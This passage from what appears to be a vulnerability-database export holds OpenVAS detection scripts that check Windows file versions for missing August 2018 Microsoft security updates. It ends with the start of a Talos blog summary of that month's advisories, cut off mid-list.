Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4343900)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813845\");\n script_version(\"2020-06-04T11:13:22+0000\");\n script_cve_id(\"CVE-2018-3615\", \"CVE-2018-3620\", \"CVE-2018-3646\", \"CVE-2018-8316\",\n \"CVE-2018-8339\", \"CVE-2018-8341\", \"CVE-2018-8342\", \"CVE-2018-8343\",\n \"CVE-2018-8345\", \"CVE-2018-8348\", \"CVE-2018-8349\", \"CVE-2018-8344\",\n \"CVE-2018-8351\", \"CVE-2018-8353\", \"CVE-2018-8355\", \"CVE-2018-8346\",\n \"CVE-2018-8371\", \"CVE-2018-8372\", \"CVE-2018-8373\", \"CVE-2018-8385\",\n \"CVE-2018-8389\", \"CVE-2018-8394\", \"CVE-2018-8396\", \"CVE-2018-8397\",\n \"CVE-2018-8398\", \"CVE-2018-8403\", \"CVE-2018-8404\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 11:13:22 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-08-15 13:17:43 +0530 (Wed, 15 Aug 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4343900)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4343900\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - A new speculative execution side channel vulnerability known as L1 Terminal\n Fault.\n\n - Internet Explorer improperly validates hyperlinks before loading executable\n libraries.\n\n - Windows Installer fails to properly sanitize input leading to an insecure library\n loading behavior.\n\n - NDIS fails to check the length of a buffer prior to copying memory to it.\n\n - Windows font library improperly handles specially crafted embedded fonts.\n\n - An improper processing for a .LNK file.\n\n - 'Microsoft COM for Windows' fails to properly handle serialized objects.\n\n - Microsoft browsers improperly allow cross-frame interaction.\n\n - Microsoft browsers allowing sandbox escape.\n\n - Microsoft Edge improperly handles redirect requests and specific HTML content.\n\n - Microsoft .NET Framework improperly access information in multi-tenant environments.\n\n - WebAudio Library improperly handles audio requests.\n\n - Windows GDI component improperly discloses the contents of its memory.\n\n - Windows PDF Library improperly handles objects in memory.\n\n - Windows Shell does not properly validate file paths.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, run processes in an elevated context, obtain\n information to further compromise the user's system, trick a user into believing\n that the user was on a legitimate website, read privileged data across trust\n boundaries and also bypass certain security restrictions.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 7 for 32-bit/x64 Systems Service Pack 1\n\n - Microsoft Windows Server 2008 R2 for x64-based Systems Service Pack 1\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4343900\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nmsVer = fetch_file_version(sysPath:sysPath, file_name:\"Mshtml.dll\");\nif(!msVer){\n exit(0);\n}\n\nif(version_is_less(version:msVer, test_version:\"11.0.9600.19101\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Mshtml.dll\",\n file_version:msVer, vulnerable_range:\"Less than 11.0.9600.19101\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:06:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8401", "CVE-2018-0952", "CVE-2018-8200", "CVE-2018-8343", "CVE-2018-8406", "CVE-2018-8345", "CVE-2018-8351", "CVE-2018-8377", "CVE-2018-8403", "CVE-2018-8372", "CVE-2018-8388", "CVE-2018-8405", "CVE-2018-8339", "CVE-2018-8387", "CVE-2018-8344", "CVE-2018-8400", "CVE-2018-8355", "CVE-2018-8350", "CVE-2018-8394", "CVE-2018-3646", "CVE-2018-8316", "CVE-2018-8373", "CVE-2018-8357", "CVE-2018-8383", "CVE-2018-8390", "CVE-2018-8266", "CVE-2018-3620", "CVE-2018-8404", "CVE-2018-8399", "CVE-2018-8380", "CVE-2018-3615", "CVE-2018-8348", "CVE-2018-8370", "CVE-2018-8341", "CVE-2018-8204", "CVE-2018-8414", "CVE-2018-8347", "CVE-2018-8385", "CVE-2018-8381", "CVE-2018-8371", "CVE-2018-8340", "CVE-2018-8360", "CVE-2018-8389", "CVE-2018-8398", "CVE-2018-8353", "CVE-2018-8349"], "description": "This host is missing a critical security\n update according to Microsoft KB4343909", "modified": "2020-06-04T00:00:00", "published": "2018-08-15T00:00:00", "id": "OPENVAS:1361412562310813843", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813843", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4343909)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4343909)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813843\");\n script_version(\"2020-06-04T11:13:22+0000\");\n script_cve_id(\"CVE-2018-3615\", \"CVE-2018-3620\", \"CVE-2018-3646\", \"CVE-2018-0952\",\n \"CVE-2018-8200\", \"CVE-2018-8204\", \"CVE-2018-8266\", \"CVE-2018-8316\",\n \"CVE-2018-8339\", \"CVE-2018-8340\", \"CVE-2018-8341\", \"CVE-2018-8343\",\n \"CVE-2018-8344\", \"CVE-2018-8345\", \"CVE-2018-8347\", \"CVE-2018-8348\",\n \"CVE-2018-8349\", \"CVE-2018-8350\", \"CVE-2018-8351\", \"CVE-2018-8353\",\n \"CVE-2018-8355\", \"CVE-2018-8357\", \"CVE-2018-8360\", \"CVE-2018-8370\",\n \"CVE-2018-8371\", \"CVE-2018-8372\", \"CVE-2018-8373\", \"CVE-2018-8377\",\n \"CVE-2018-8380\", \"CVE-2018-8381\", \"CVE-2018-8383\", \"CVE-2018-8385\",\n \"CVE-2018-8387\", \"CVE-2018-8388\", \"CVE-2018-8389\", \"CVE-2018-8390\",\n \"CVE-2018-8394\", \"CVE-2018-8398\", \"CVE-2018-8399\", \"CVE-2018-8400\",\n \"CVE-2018-8401\", \"CVE-2018-8403\", \"CVE-2018-8404\", \"CVE-2018-8405\",\n \"CVE-2018-8406\", \"CVE-2018-8414\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 11:13:22 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-08-15 13:05:04 +0530 (Wed, 15 Aug 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4343909)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4343909\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - A new speculative execution side channel vulnerability known as L1 Terminal\n Fault.\n\n - Diagnostics Hub Standard Collector allows file creation in arbitrary locations.\n\n - Multiple security feature bypass vulnerability exists in Device Guard.\n\n - Chakra scripting engine improperly handles objects in memory in Microsoft Edge.\n\n - Internet Explorer improperly validates hyperlinks before loading executable libraries.\n\n - Windows Installer fails to properly sanitize input leading to an insecure library\n loading behavior.\n\n - Windows kernel and DirectX Graphics Kernel (DXGKRNL) driver improperly handles\n objects in memory.\n\n - NDIS fails to check the length of a buffer prior to copying memory to it.\n\n - Windows font library improperly handles specially crafted embedded fonts.\n\n - An improper processing for a .LNK file.\n\n - 'Microsoft COM for Windows' fails to properly handle serialized objects.\n\n - Microsoft browsers improperly allow cross-frame interaction.\n\n - Microsoft browsers allowing sandbox escape.\n\n - Microsoft Edge improperly handles redirect requests and specific HTML content.\n\n - Microsoft .NET Framework improperly access information in multi-tenant environments.\n\n - WebAudio Library improperly handles audio requests.\n\n - Windows GDI component improperly discloses the contents of its memory.\n\n - Windows PDF Library improperly handles objects in memory.\n\n - Microsoft Edge does not properly parse HTTP content.\n\n - Windows Shell does not properly validate file paths.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, run processes in an elevated context, obtain\n information to further compromise the user's system, trick a user into believing\n that the user was on a legitimate website, read privileged data across trust\n boundaries and also bypass certain security restrictions.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1803 for 32-bit Systems\n\n - Microsoft Windows 10 Version 1803 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4343909\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.17134.0\", test_version2:\"11.0.17134.227\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.17134.0 - 11.0.17134.227\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:06:05", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8401", "CVE-2018-0952", "CVE-2018-8200", "CVE-2018-8343", "CVE-2018-8406", "CVE-2018-8345", "CVE-2018-8351", "CVE-2018-8403", "CVE-2018-8372", "CVE-2018-8405", "CVE-2018-8339", "CVE-2018-8344", "CVE-2018-8355", "CVE-2018-8394", "CVE-2018-3646", "CVE-2018-8316", "CVE-2018-8373", "CVE-2018-8357", "CVE-2018-8266", "CVE-2018-3620", "CVE-2018-8404", "CVE-2018-3615", "CVE-2018-8348", "CVE-2018-8370", "CVE-2018-8341", "CVE-2018-8204", "CVE-2018-8385", "CVE-2018-8381", "CVE-2018-8371", "CVE-2018-8360", "CVE-2018-8389", "CVE-2018-8398", "CVE-2018-8353", "CVE-2018-8349"], "description": "This host is missing a critical security\n update according to Microsoft KB4343892", "modified": "2020-06-04T00:00:00", "published": "2018-08-15T00:00:00", "id": "OPENVAS:1361412562310813841", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813841", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4343892)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4343892)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813841\");\n script_version(\"2020-06-04T11:13:22+0000\");\n script_cve_id(\"CVE-2018-3615\", \"CVE-2018-3620\", \"CVE-2018-3646\", \"CVE-2018-0952\",\n \"CVE-2018-8200\", \"CVE-2018-8204\", \"CVE-2018-8266\", \"CVE-2018-8316\",\n \"CVE-2018-8339\", \"CVE-2018-8341\", \"CVE-2018-8343\", \"CVE-2018-8344\",\n \"CVE-2018-8345\", \"CVE-2018-8348\", \"CVE-2018-8349\", \"CVE-2018-8351\",\n \"CVE-2018-8355\", \"CVE-2018-8357\", \"CVE-2018-8360\", \"CVE-2018-8353\",\n \"CVE-2018-8370\", \"CVE-2018-8371\", \"CVE-2018-8372\", \"CVE-2018-8373\",\n \"CVE-2018-8381\", \"CVE-2018-8385\", \"CVE-2018-8389\", \"CVE-2018-8394\",\n \"CVE-2018-8398\", \"CVE-2018-8401\", \"CVE-2018-8403\", \"CVE-2018-8404\",\n \"CVE-2018-8405\", \"CVE-2018-8406\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 11:13:22 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-08-15 12:09:21 +0530 (Wed, 15 Aug 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4343892)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4343892\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - A new speculative execution side channel vulnerability known as L1 Terminal\n Fault.\n\n - Diagnostics Hub Standard Collector allows file creation in arbitrary locations.\n\n - Multiple security feature bypass vulnerability exists in Device Guard.\n\n - Chakra scripting engine improperly handles objects in memory in Microsoft Edge.\n\n - Internet Explorer improperly validates hyperlinks before loading executable\n libraries.\n\n - Windows Installer fails to properly sanitize input leading to an insecure library\n loading behavior.\n\n - Windows kernel and DirectX Graphics Kernel (DXGKRNL) driver improperly handles\n objects in memory.\n\n - NDIS fails to check the length of a buffer prior to copying memory to it.\n\n - Windows font library improperly handles specially crafted embedded fonts.\n\n - An improper processing for a .LNK file.\n\n - 'Microsoft COM for Windows' fails to properly handle serialized objects.\n\n - Microsoft browsers improperly allow cross-frame interaction.\n\n - Microsoft browsers allowing sandbox escape.\n\n - Microsoft Edge improperly handles redirect requests and specific HTML content.\n\n - Microsoft .NET Framework improperly access information in multi-tenant environments.\n\n - WebAudio Library improperly handles audio requests.\n\n - Windows GDI component improperly discloses the contents of its memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, run processes in an elevated context, obtain\n information to further compromise the user's system, trick a user into believing\n that the user was on a legitimate website, read privileged data across trust\n boundaries and also bypass certain security restrictions.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 for 32-bit Systems\n\n - Microsoft Windows 10 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4343892\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.10240.0\", test_version2:\"11.0.10240.17945\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.10240.0 - 11.0.10240.17945\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T13:29:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8401", "CVE-2018-0952", "CVE-2018-8200", "CVE-2018-8343", "CVE-2018-8406", "CVE-2018-8345", "CVE-2018-8351", "CVE-2018-8358", "CVE-2018-8403", "CVE-2018-8372", "CVE-2018-8388", "CVE-2018-8405", "CVE-2018-8339", "CVE-2018-8344", "CVE-2018-8355", "CVE-2018-8394", "CVE-2018-3646", "CVE-2018-8316", "CVE-2018-8373", "CVE-2018-8357", "CVE-2018-8266", "CVE-2018-3620", "CVE-2018-8404", "CVE-2018-3615", "CVE-2018-8348", "CVE-2018-8370", "CVE-2018-8341", "CVE-2018-8204", "CVE-2018-8347", "CVE-2018-8385", "CVE-2018-8381", "CVE-2018-8253", "CVE-2018-8371", "CVE-2018-8340", "CVE-2018-8360", "CVE-2018-8389", "CVE-2018-8398", "CVE-2018-8353", "CVE-2018-8349"], "description": "This host is missing a critical security\n update according to Microsoft KB4343887", "modified": "2019-12-20T00:00:00", "published": "2018-08-15T00:00:00", "id": "OPENVAS:1361412562310813840", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813840", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4343887)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4343887)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813840\");\n script_version(\"2019-12-20T10:24:46+0000\");\n script_cve_id(\"CVE-2018-3615\", \"CVE-2018-3620\", \"CVE-2018-3646\", \"CVE-2018-0952\",\n \"CVE-2018-8200\", \"CVE-2018-8204\", \"CVE-2018-8253\", \"CVE-2018-8266\",\n \"CVE-2018-8316\", \"CVE-2018-8339\", \"CVE-2018-8340\", \"CVE-2018-8341\",\n \"CVE-2018-8343\", \"CVE-2018-8344\", \"CVE-2018-8345\", \"CVE-2018-8347\",\n \"CVE-2018-8348\", \"CVE-2018-8349\", \"CVE-2018-8351\", \"CVE-2018-8353\",\n \"CVE-2018-8355\", \"CVE-2018-8357\", \"CVE-2018-8358\", \"CVE-2018-8360\",\n \"CVE-2018-8370\", \"CVE-2018-8371\", \"CVE-2018-8372\", \"CVE-2018-8373\",\n \"CVE-2018-8381\", \"CVE-2018-8385\", \"CVE-2018-8388\", \"CVE-2018-8389\",\n \"CVE-2018-8394\", \"CVE-2018-8398\", \"CVE-2018-8401\", \"CVE-2018-8403\",\n \"CVE-2018-8404\", \"CVE-2018-8405\", \"CVE-2018-8406\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 10:24:46 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-08-15 11:42:20 +0530 (Wed, 15 Aug 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4343887)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4343887\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - A new speculative execution side channel vulnerability known as L1 Terminal\n Fault.\n\n - Diagnostics Hub Standard Collector allows file creation in arbitrary locations.\n\n - Multiple security feature bypass vulnerability exists in Device Guard.\n\n - Microsoft Cortana allows arbitrary website browsing on the lockscreen.\n\n - Chakra scripting engine improperly handles objects in memory in Microsoft Edge.\n\n - Internet Explorer improperly validates hyperlinks before loading executable\n libraries.\n\n - Windows Installer fails to properly sanitize input leading to an insecure library\n loading behavior.\n\n - Active Directory Federation Services (AD FS) improperly handles multi-factor\n authentication requests.\n\n - Windows kernel, DirectX Graphics Kernel (DXGKRNL) driver and Win32k component\n improperly handles objects in memory.\n\n - NDIS fails to check the length of a buffer prior to copying memory to it.\n\n - Windows font library improperly handles specially crafted embedded fonts.\n\n - An improper processing for a .LNK file.\n\n - Windows kernel fails to properly handle parsing of certain symbolic links.\n\n - 'Microsoft COM for Windows' fails to properly handle serialized objects.\n\n - Microsoft browsers improperly allow cross-frame interaction.\n\n - Microsoft browsers allowing sandbox escape.\n\n - Microsoft .NET Framework improperly access information in multi-tenant environments.\n\n - WebAudio Library improperly handles audio requests.\n\n - Windows GDI component improperly discloses the contents of its memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, run processes in an elevated context, obtain\n information to further compromise the user's system, trick a user into believing\n that the user was on a legitimate website, read privileged data across trust\n boundaries and also bypass certain security restrictions.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1607 x32/x64\n\n - Microsoft Windows Server 2016\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4343887\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2016:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.14393.0\", test_version2:\"11.0.14393.2429\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.14393.0 - 11.0.14393.2429\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "talosblog": [{"lastseen": "2018-09-08T09:19:42", "bulletinFamily": "blog", "cvelist": ["CVE-2018-0952", "CVE-2018-8200", "CVE-2018-8204", "CVE-2018-8253", "CVE-2018-8266", "CVE-2018-8273", "CVE-2018-8302", "CVE-2018-8316", "CVE-2018-8339", "CVE-2018-8340", "CVE-2018-8341", "CVE-2018-8342", "CVE-2018-8343", "CVE-2018-8344", "CVE-2018-8345", "CVE-2018-8346", "CVE-2018-8347", "CVE-2018-8348", "CVE-2018-8349", "CVE-2018-8350", "CVE-2018-8351", "CVE-2018-8353", "CVE-2018-8355", "CVE-2018-8357", "CVE-2018-8358", "CVE-2018-8359", "CVE-2018-8360", "CVE-2018-8370", "CVE-2018-8371", "CVE-2018-8372", "CVE-2018-8373", "CVE-2018-8375", "CVE-2018-8376", "CVE-2018-8377", "CVE-2018-8378", "CVE-2018-8379", "CVE-2018-8380", "CVE-2018-8381", "CVE-2018-8382", "CVE-2018-8383", "CVE-2018-8384", "CVE-2018-8385", "CVE-2018-8387", "CVE-2018-8389", "CVE-2018-8390", "CVE-2018-8394", "CVE-2018-8396", "CVE-2018-8397", "CVE-2018-8398", "CVE-2018-8399", "CVE-2018-8400", "CVE-2018-8401", "CVE-2018-8403", "CVE-2018-8404", "CVE-2018-8405", "CVE-2018-8406", "CVE-2018-8412", "CVE-2018-8414"], "description": "Microsoft released its monthly set of security advisories today for vulnerabilities that have been identified and addressed in various products. This month's advisory release addresses 62 new vulnerabilities, 20 of which are rated \u201ccritical,\u201d 38 that are rated \u201cimportant,\u201d one that is rated moderate and one that is rated as low severity. These vulnerabilities impact Windows Operating System, Edge and Internet Explorer, along with several other products.\n\n \n\n\nIn addition to the 60 vulnerabilities referenced above, Microsoft has also released a critical update advisory, ADV180020 which addresses the vulnerabilities described in the Adobe Flash Security Bulletin APSB18-25.\n\n \n\n\n### Critical Vulnerabilities\n\n \n\n\nThis month, Microsoft is addressing 20 vulnerabilities that are rated \"critical.\" Talos believes 10 of these are notable and require prompt attention.\n\n \n\n\n[CVE-2018-8273](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8273>) is a remote code execution vulnerability in the Microsoft SQL Server that could allow an attacker who successfully exploits the vulnerability to execute code in the context of the SQL Server Database Engine Service account.\n\n \n\n\n[CVE-2018-8302](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8302>) is a remote code execution vulnerability in the Microsoft Exchange email and calendar software that could allow an attacker who successfully exploits the vulnerability to run arbitrary code in the context of the system user when the software fails to properly handle objects in memory.\n\n \n\n\n[CVE-2018-8344](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8344>) is a remote code execution vulnerability that exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploits this vulnerability could take control of the affected system. This vulnerability can be exploited in multiple ways. By leveraging a web-based attack, an attacker can convince a user to visit a web page that has been specially crafted to exploit this vulnerability. This could be in the form of an attacker-controlled webpage, or simply a page that hosts external content, such as advertisements. An attacker can also provide a specially crafted document that is designed to exploit the vulnerability, and then convince users to open the document file.\n\n \n\n\n[CVE-2018-8350](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8350>) is a remote code execution vulnerability that exists when the Microsoft Windows PDF Library improperly handles objects in memory. An attacker who successfully exploits the vulnerability could gain the same user rights as the current user. The vulnerability can be exploited simply by viewing a website that hosts a malicious PDF file on a Windows 10 system with Microsoft Edge set as the default browser. On other affected systems, that do not render PDF content automatically, an attacker would have to convince users to open a specially crafted PDF document, such as a PDF attachment to an email message.\n\n \n\n\n[CVE-2018-8266](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8266>), [CVE-2018-8355](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8355>), 